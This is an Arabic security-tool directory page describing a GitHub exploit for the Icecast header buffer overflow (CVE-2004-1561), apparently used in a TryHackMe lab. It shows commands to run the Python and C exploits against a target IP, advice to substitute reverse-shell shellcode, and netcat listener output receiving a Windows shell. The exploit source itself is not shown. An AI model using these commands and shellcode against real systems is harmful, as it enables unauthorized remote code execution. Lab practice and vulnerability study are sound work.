Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2004-1561 — Icecast ثغرة تجاوز سعة المخزن المؤقت وكتابة رأس (Header Overwrite) تؤدي إلى تنفيذ كود عن بُعد (RCE) للإصدارات < 2.0.1 (Win32) | Kitploit
أدوات/GitHubGitHub/ivanitlearning/cve-2004-1561
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعد
GitHubivanitlearning/cve-2004-1561

CVE-2004-1561

Icecast ثغرة تجاوز سعة المخزن المؤقت وكتابة رأس (Header Overwrite) تؤدي إلى تنفيذ كود عن بُعد (RCE) للإصدارات < 2.0.1 (Win32)

عرض المستودع
72منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2004-1561 تجاوز سعة المخزن المؤقت لرأس Icecast يؤدي إلى تنفيذ تعليمات برمجية عن بُعد < 2.0.1 (Win32)

إصدار Python 3 من تجاوز سعة المخزن المؤقت لرأس Icecast المؤدي إلى تنفيذ تعليمات برمجية عن بُعد < 2.0.1 (Win32)، معاد كتابته من وحدة Metasploit. أعدت كتابته من وحدة Metasploit لأنني لم أستطع تشغيل هذا.

الاستخدام:

استبدل شيلكود الصدفة العكسية في الاستغلال، واستدعه مع وسيط للخادم البعيد والمنفذ.

root@kitploit:~
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000

Done!

مستمع الصدفة العكسية:

root@kitploit:~
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

تحديث لـ 568-edit.c

تمكنت من تشغيل الاستغلال الأصلي. تم التعديل وفقًا لهذا.

الاستخدام لـ 568-edit.c

root@kitploit:~
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133

Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org

shellcode add-on by Delikon
www.delikon.de

- target 192.168.92.133:8000
- send malformed data

Server IS vulnerable!!!

على المستمع

root@kitploit:~
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Icecast2 Win32>

تنزيل الأداة